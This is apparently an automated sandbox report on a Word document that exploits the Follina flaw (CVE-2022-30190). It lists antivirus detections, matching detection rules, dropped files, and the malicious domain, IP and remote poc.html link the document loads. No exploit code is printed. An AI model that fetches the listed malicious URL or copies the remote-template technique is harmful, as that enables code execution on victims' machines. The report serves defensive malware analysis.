Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4D314135.htm, type: DROPPED	Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4D314135.htm, type: DROPPED	Matched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, hash2 = 778cbb0ee4afffca6a0b788a97bc2f4855ceb69ddc5eaa230acfa2834e1aeb07, hash1 = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-18
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3BF80B4F.htm, type: DROPPED	Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3BF80B4F.htm, type: DROPPED	Matched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, hash2 = 778cbb0ee4afffca6a0b788a97bc2f4855ceb69ddc5eaa230acfa2834e1aeb07, hash1 = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-18
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\poc[1].htm, type: DROPPED	Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\poc[1].htm, type: DROPPED	Matched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, hash2 = 778cbb0ee4afffca6a0b788a97bc2f4855ceb69ddc5eaa230acfa2834e1aeb07, hash1 = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-18

Source: ~WRF{FB6581E1-1A5E-4649-84C2-3FA331ABA6D2}.tmp.0.dr

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Source: fHER4lglqY.docx	Virustotal: Detection: 25%
Source: fHER4lglqY.docx	Metadefender: Detection: 22%
Source: fHER4lglqY.docx	ReversingLabs: Detection: 48%

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: fHER4lglqY.LNK.0.dr

LNK file: ..\..\..\..\..\Desktop\fHER4lglqY.docx

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$ER4lglqY.docx

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR5456.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.expl.evad.winDOCX@1/18@15/1

Source: ~WRF{FB6581E1-1A5E-4649-84C2-3FA331ABA6D2}.tmp.0.dr	OLE document summary: title field not present or empty
Source: ~WRF{FB6581E1-1A5E-4649-84C2-3FA331ABA6D2}.tmp.0.dr	OLE document summary: author field not present or empty
Source: ~WRF{FB6581E1-1A5E-4649-84C2-3FA331ABA6D2}.tmp.0.dr	OLE document summary: edited time not present or 0

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: ~WRF{FB6581E1-1A5E-4649-84C2-3FA331ABA6D2}.tmp.0.dr

Initial sample: OLE indicators vbamacros = False

Persistence and Installation Behavior

Contains an external reference to another file

Source: document.xml.rels

Extracted files from sample: https://2hell.nl/follina/poc.html!

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	13 Exploitation for Client Execution	Path Interception	Path Interception	1 Masquerading	OS Credential Dumping	1 File and Directory Discovery	Remote Services	Data from Local System	Exfiltration Over Other Network Medium	1 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Rootkit	LSASS Memory	2 System Information Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	2 Non-Application Layer Protocol	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	13 Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	2 Ingress Tool Transfer	SIM Card Swap		Carrier Billing Fraud

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
fHER4lglqY.docx	25%	Virustotal		Browse
fHER4lglqY.docx	23%	Metadefender		Browse
fHER4lglqY.docx	49%	ReversingLabs	Document-Word.Trojan.Heuristic
fHER4lglqY.docx	100%	Avira	W97M/Dldr.Agent.G1

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\poc[1].htm	100%	Avira	JS/CVE-2022-30190.G
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4D314135.htm	100%	Avira	JS/CVE-2022-30190.G
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3BF80B4F.htm	100%	Avira	JS/CVE-2022-30190.G

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
2hell.nl	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
https://2hell.nl/follina/poc.html	10%	Virustotal		Browse
https://2hell.nl/follina/poc.html	100%	Avira URL Cloud	malware
https://2hell.nl/follina/poc.htmlyX	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
2hell.nl	178.21.112.152	true	true	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://2hell.nl/follina/poc.html	true	10%, Virustotal, Browse Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://2hell.nl/follina/poc.htmlyX	~WRF{FB6581E1-1A5E-4649-84C2-3FA331ABA6D2}.tmp.0.dr	true	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
178.21.112.152	2hell.nl	Netherlands		29028	COMPUKOS-ASNL	true

General Information

Joe Sandbox Version:	35.0.0 Citrine
Analysis ID:	685991
Start date and time:	2022-08-18 03:25:22 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 4m 50s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	fHER4lglqY (renamed file extension from none to docx)
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	1
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.expl.evad.winDOCX@1/18@15/1
EGA Information:	Failed
HDC Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer

Warnings

Exclude process from analysis (whitelisted): mrxdav.sys, dllhost.exe, rundll32.exe
Report size getting too big, too many NtQueryAttributesFile calls found.

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
COMPUKOS-ASNL	tarifvertrag_knappschaft_bahn_see.js	Get hash	malicious	Browse	141.105.127.158
COMPUKOS-ASNL	tarifvertrag_knappschaft_bahn_see.js	Get hash	malicious	Browse	141.105.127.158

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
05af1f5ca1b87cc9cc9b25185115607d	wWLwoD14Xo.docx	Get hash	malicious	Browse	178.21.112.152
	ZZkLH4O0Y3.docx	Get hash	malicious	Browse	178.21.112.152
	icRTA4gcSe.docx	Get hash	malicious	Browse	178.21.112.152
	dfqqRjnCV5.docx	Get hash	malicious	Browse	178.21.112.152
	uaMVRwwuyZ.docx	Get hash	malicious	Browse	178.21.112.152
	SOA USD 85,200.00.docx	Get hash	malicious	Browse	178.21.112.152
	ORDER 4X30DB.docx	Get hash	malicious	Browse	178.21.112.152
	Order 90541#.docx	Get hash	malicious	Browse	178.21.112.152
	NextEra RFQ and Business Proposition.docx	Get hash	malicious	Browse	178.21.112.152
	BL-20-89DS.docx	Get hash	malicious	Browse	178.21.112.152
	NOA & Pre-loading docs of CBHU9101956.docx	Get hash	malicious	Browse	178.21.112.152
	Product_specification_1.docx	Get hash	malicious	Browse	178.21.112.152
	NOA & Pre-loading docs of CBHU9101956.docx	Get hash	malicious	Browse	178.21.112.152
	NewXOrder.xlsm	Get hash	malicious	Browse	178.21.112.152
	payroll_details.docm	Get hash	malicious	Browse	178.21.112.152
	payroll_details.docm	Get hash	malicious	Browse	178.21.112.152
	B86i0Iwc4H.docx	Get hash	malicious	Browse	178.21.112.152
	NEW ORDER EM067022.docx	Get hash	malicious	Browse	178.21.112.152
	A_Ponudu 6885242958.docx	Get hash	malicious	Browse	178.21.112.152
	Q2_FECDRA Ponudu.docx	Get hash	malicious	Browse	178.21.112.152
7dcce5b76c8b17472d024758970a406b	wWLwoD14Xo.docx	Get hash	malicious	Browse	178.21.112.152
	ZZkLH4O0Y3.docx	Get hash	malicious	Browse	178.21.112.152
	icRTA4gcSe.docx	Get hash	malicious	Browse	178.21.112.152
	dfqqRjnCV5.docx	Get hash	malicious	Browse	178.21.112.152
	uaMVRwwuyZ.docx	Get hash	malicious	Browse	178.21.112.152
	Product Data Sheet.xlsx	Get hash	malicious	Browse	178.21.112.152
	transcation_swift_dload_16Aug2022_15324.doc	Get hash	malicious	Browse	178.21.112.152
	SOA USD 85,200.00.docx	Get hash	malicious	Browse	178.21.112.152
	ORDER 4X30DB.docx	Get hash	malicious	Browse	178.21.112.152
	SecuriteInfo.com.Exploit.Siggen3.17149.4489.xls	Get hash	malicious	Browse	178.21.112.152
	SecuriteInfo.com.Exploit.Siggen3.17149.11632.xls	Get hash	malicious	Browse	178.21.112.152
	SecuriteInfo.com.Exploit.Siggen3.17149.3543.xls	Get hash	malicious	Browse	178.21.112.152
	SecuriteInfo.com.Exploit.Siggen3.17149.10211.xls	Get hash	malicious	Browse	178.21.112.152
	SecuriteInfo.com.Exploit.Siggen3.17149.24514.xls	Get hash	malicious	Browse	178.21.112.152
	SecuriteInfo.com.Exploit.Siggen3.17149.32268.xls	Get hash	malicious	Browse	178.21.112.152
	SecuriteInfo.com.Exploit.Siggen3.17149.6905.xls	Get hash	malicious	Browse	178.21.112.152
	Order 90541#.docx	Get hash	malicious	Browse	178.21.112.152
	SecuriteInfo.com.Exploit.Siggen3.17149.12724.xls	Get hash	malicious	Browse	178.21.112.152
	SecuriteInfo.com.Exploit.Siggen3.17149.8245.xls	Get hash	malicious	Browse	178.21.112.152
	SecuriteInfo.com.Exploit.Siggen3.17149.13096.xls	Get hash	malicious	Browse	178.21.112.152

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	131072
Entropy (8bit):	0.2870048758293995
Encrypted:	false
SSDEEP:	48:I3a1RB74WvIfbz9s2df8IQpINoQ/QiQNQGtULNS/rZQ+QNH:KgL7WtbrkWv9AGLNSTZncH
MD5:	EC9A7D70A816366A8AD0612EE7DAD739
SHA1:	211C3DF619B389F77457B057074FD7F4DA9D002D
SHA-256:	072E182B4D7CB3314F0B2FF9D40766A095F5838DDD2B6E3F2777C6F7A3D79905
SHA-512:	F667EB136F6444F31FAAB94E6D10D14D097870E7CCAB93E5127961D2DC2B6FBDE206183522F50436B54C12E44F1A121CD6C16C13B2C306D713B27408AB0D2920
Malicious:	false
Reputation:	low
Preview:	......M.eFy...z(`.g,.*D...o...3S,...X.F...Fa.q............................Q..)d?.K..KF...@..........a..8O..7..-...A...................................E...............................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@....p..G...s.q.Q9G..a`..qb.....p..G.........J..R.w.ps............................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{469EB5A9-1D77-4731-94E0-EE25EED167A3}.FSD

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	131072
Entropy (8bit):	0.6741548819501937
Encrypted:	false
SSDEEP:	96:KeaeCyuA6ePGhOfBmS2fmjpMkuPyr6P/0/9oGZIT0tVb4/////T/VyuxPXa/lPhw:nx6eP0FUlYG2otdu/DVyuxPCpbr
MD5:	BD9BCE9BD766B0C50F6BDD1409BBDEB0
SHA1:	E387BA8EB8AAA2DDD14033D255D17BE68EEE3C55
SHA-256:	28EDF61A62B1C6F4C5A5D71AE369EE5C4AA8292189D660338992B7DAED014EDF
SHA-512:	AA07253F9DDD6D02216E96B979659EDD5E299658AB8F71A6897FFDF0AC40DAE29E92461F0E46E3EE14A2F76A071C51222996D43DFE54F9DD8BB81D6F177A1C49
Malicious:	false
Reputation:	low
Preview:	......M.eFy...z.?Jfi.E.q7.4..0S,...X.F...Fa.q............................#...n..G..dx.............}...G[C..l..T@.S...................................W...............................x...x...x...x..*............................................................................................................................................................................................................................................................................................................................zV.......... ..@....p..G...s.q.Q9G..a`..qb.....p..G.....5.2A....................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSF-CTBL.FSF

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	114
Entropy (8bit):	3.934207961409454
Encrypted:	false
SSDEEP:	3:yVlgsRlz1Glg9BcT7IIl0Yxl8dI4pKpWEjl276:yPblzElggTEIRxl8dIBX22
MD5:	DBA4B08FF943511A17440A6D3A639091
SHA1:	79EC57290092B5CFD266CC0F82429940DE111BF6
SHA-256:	5FED6073738D6334C21CF755BA59C1D8263838DB98A05843CC498F919F835609
SHA-512:	7914072E66FB17FF44957467E51D33BF3F7C5948FC93A4C1F44F7F7DD34D09478B302C728FE55574F6F72B94206D47C9DF7DE871181EAA05017A201CE12FC92F
Malicious:	false
Reputation:	low
Preview:	..H..@....b..q....]F.S.D.-.{.4.6.9.E.B.5.A.9.-.1.D.7.7.-.4.7.3.1.-.9.4.E.0.-.E.E.2.5.E.E.D.1.6.7.A.3.}...F.S.D..

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	131072
Entropy (8bit):	0.28744221424527927
Encrypted:	false
SSDEEP:	48:I3z/ERBzET5RqIhb9ByvXWpZqfTbrZJHvH:Kz/ELXm1pZqL3PH
MD5:	A66312A6CB954A6150D5AFB584B5A8B3
SHA1:	26E4AC2E42E72A854E0E202AD6C160ADF2415314
SHA-256:	4F2AF0D38289B8EF8BEE2414A1BB01B973C064905E571BB7421E6BD852D6AEDC
SHA-512:	DCEFB07E904F63E4B4F1EAEDFAA10A6AC879A7BCD1486A64D0082B1BECB1ADFA6F8B2316EA81B79EC2AAFE59EEA832EFF5F3B300FFFF5F1C751C992F564E895D
Malicious:	false
Reputation:	low
Preview:	......M.eFy...z=3..=.M.H.K.t..S,...X.F...Fa.q............................\.`)^s.G.\|..._..........R@....C...t...Z.A...................................E...............................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@....p..G...s.q.Q9G..a`..qb.....p..G.........J..R.w.ps............................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{D6F1608A-034A-4693-92DF-9F6F675BC0BA}.FSD

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	131072
Entropy (8bit):	0.22169652718262306
Encrypted:	false
SSDEEP:	48:I36JKUUrBZfR2fNIiLMMtRS/9FvP14Jqrvp0vk+ip0vk+W:K0ZCGMMKXIzW
MD5:	543D6526423FBA0DC5BC4CD9B5990CEC
SHA1:	9FA79AD3E23A8D4AF6F0078FC77FCF83BE663452
SHA-256:	53CFB4F00751832884F2FC168A97FAB523ED9833663169FC797C01281E922C04
SHA-512:	B7ACA1EDA28D5556A8381718AFB61C3C3507F9E8F4BD6CBA3C75C72AC7107DF6C3041E51B5B94651856D2208F4B7E9E8F5D748175C46703995EADC18566107CA
Malicious:	false
Reputation:	low
Preview:	......M.eFy...z.....\D..6...^S,...X.F...Fa.q..............................kn..@.................C.=B.EK.....s}.P>..................................PB...............................x...x...x...x..........+....................................................................................................................................................................................................................................................................................................................zV.......... ..@....p..G...s.q.Q9G..a`..qb.....p..G...\|.u-.u.A...W"U.............................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSF-{0E1EEE64-E8C6-4E2A-9759-63CF07FD8988}.FSF

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	114
Entropy (8bit):	3.9376321677740433
Encrypted:	false
SSDEEP:	3:yVlgsRlzfqJds4MkWSg2lUt7TYQckClL7276:yPblzfqTsLkWSg2lRQckCt22
MD5:	782CE5A82AFB74AE293FED453122DB20
SHA1:	E1329D7D27002B4002827124B2457A3A01B2BEEF
SHA-256:	52BC8B7A17D59A4CC93AF4FE6A0474B893B963EE9C33979E22AAA7B1A00A3902
SHA-512:	777E83913D9644AC814EAE384E86E0E14E1289199575229418699260A5C1D0F005C534E5EFAA8309290D0502D51196B06B5EACD71F055684492D24E762ABD379
Malicious:	false
Reputation:	low
Preview:	..H..@....b..q....]F.S.D.-.{.D.6.F.1.6.0.8.A.-.0.3.4.A.-.4.6.9.3.-.9.2.D.F.-.9.F.6.F.6.7.5.B.C.0.B.A.}...F.S.D..

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\poc[1].htm

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	HTML document, ASCII text, with CRLF line terminators
Category:	downloaded
Size (bytes):	6774
Entropy (8bit):	0.7823015818904822
Encrypted:	false
SSDEEP:	6:qTFQzhqIAXMzSKWEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEM:qTWvzSsAxH8d2GZfgGw1sue4kVM1Gb
MD5:	EA3FE2CB4B8E3C7AFA0C773A28742AA8
SHA1:	FC00C991825CFE83AC01AD60D9BCE9E5DE2D061D
SHA-256:	8D68FC5C45CDFD449252B1E3E2EC8A1E35E00C83532628102E5F699A1190D101
